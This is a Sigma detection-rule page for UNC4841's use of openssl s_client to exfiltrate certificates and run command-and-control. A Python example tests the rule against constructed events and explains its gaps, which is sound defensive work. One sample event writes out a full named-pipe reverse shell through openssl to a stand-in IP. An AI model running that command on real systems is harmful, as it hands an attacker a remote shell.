UNC4841 - SSL Certificate Exfiltration Via Openssl
Detects the execution of "openssl" with "s_client -quiet -connect" against an IP address on port 443 or 8080. This technique was used by UNC4841 to exfiltrate SSL certificates and, combined with named pipes, as a C2 channel. Investigate commands executed in the temporal vicinity of this command.
Sigma rule
title: UNC4841 - SSL Certificate Exfiltration Via Openssl
id: 60911c07-f989-4362-84af-c609828ef829
status: test
description: Detects the execution of "openssl" to connect to an IP address. This technique was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
references:
    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-16
tags:
    - attack.defense-evasion
    - attack.t1140
    - detection.emerging-threats
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        Image|endswith: '/openssl'
        CommandLine|re: '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
        CommandLine|contains|all:
            - 's_client'
            - '-quiet'
            - '-connect'
        CommandLine|contains:
            - ':443'
            - ':8080'
    condition: selection
falsepositives:
    - Unknown
level: high
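To see exactly what the selection above fires on, here is the rule's logic implemented in Python and run over a handful of constructed process_creation events. This is an added example, not code from the Sigma project, Nextron Systems or the Mandiant report; the events, image paths and IP addresses (RFC 5737 documentation ranges) are made up for this page. Sigma string modifiers such as endswith and contains are case-insensitive by default, which the code mirrors; the re modifier is applied to the raw value.

```python
import re

# Selection taken from the Sigma rule above.
IPV4_RE = re.compile(r"[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}")
IMAGE_SUFFIX = "/openssl"
REQUIRED_ALL = ("s_client", "-quiet", "-connect")   # CommandLine|contains|all
PORTS_ANY = (":443", ":8080")                        # CommandLine|contains

# Constructed sample events (hypothetical; not real telemetry).
SAMPLE_EVENTS = [
    # Parent shell wrapping openssl in a named-pipe reverse shell. Image is
    # /bin/sh, so the rule does not fire on this event even though the
    # command line contains the openssl invocation.
    {"Image": "/bin/sh",
     "CommandLine": "sh -c 'mkfifo /tmp/p; /bin/sh -i </tmp/p 2>&1 | "
                    "openssl s_client -quiet -connect 203.0.113.10:443 >/tmp/p'"},
    # Child openssl process spawned by the shell above: fires.
    {"Image": "/usr/bin/openssl",
     "CommandLine": "openssl s_client -quiet -connect 203.0.113.10:443"},
    # Alternate port 8080: fires.
    {"Image": "/usr/bin/openssl",
     "CommandLine": "openssl s_client -quiet -connect 198.51.100.7:8080"},
    # Hostname and no -quiet: no IPv4 literal and one required token missing.
    {"Image": "/usr/bin/openssl",
     "CommandLine": "openssl s_client -connect example.com:443 -showcerts"},
    # Port 8443: ':443' is not a substring of ':8443', so no match.
    {"Image": "/usr/bin/openssl",
     "CommandLine": "openssl s_client -quiet -connect 10.0.0.5:8443"},
    # Port 4433: ':443' IS a substring of ':4433', so this fires too.
    {"Image": "/usr/bin/openssl",
     "CommandLine": "openssl s_client -quiet -connect 10.0.0.5:4433"},
    # Unrelated openssl use: no match.
    {"Image": "/usr/bin/openssl",
     "CommandLine": "openssl x509 -in server.pem -noout -text"},
]


def matches_rule(event: dict) -> bool:
    """True when a process_creation event satisfies the rule's selection."""
    image = event.get("Image", "").lower()
    cmd_raw = event.get("CommandLine", "")
    cmd = cmd_raw.lower()
    if not image.endswith(IMAGE_SUFFIX):          # Image|endswith
        return False
    if not IPV4_RE.search(cmd_raw):               # CommandLine|re
        return False
    if not all(tok in cmd for tok in REQUIRED_ALL):   # contains|all
        return False
    return any(port in cmd for port in PORTS_ANY)     # contains (any)


def run_detection(events: list) -> list:
    """Command lines of the events that fire, in input order."""
    return [e["CommandLine"] for e in events if matches_rule(e)]


if __name__ == "__main__":
    for hit in run_detection(SAMPLE_EVENTS):
        print("ALERT:", hit)
```

Two things the sample set makes visible. The rule keys on the openssl process itself, so a shell wrapper only produces a hit if your telemetry records the child process creation; and the port conditions are substring checks, so ":443" also matches ":4433" while ":8443" is missed entirely. The IPv4 regex likewise matches any dotted quad, not only routable addresses. Neither is a defect for an emerging-threats rule at level high, but both are worth knowing before triaging or tuning it.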
References
- https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
Related rules
- Potential BlackByte Ransomware Activity
- UNC4841 - Download Compressed Files From Temp.sh Using Wget
- UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
- APT PRIVATELOG Image Load Pattern
- APT27 - Emissary Panda Activity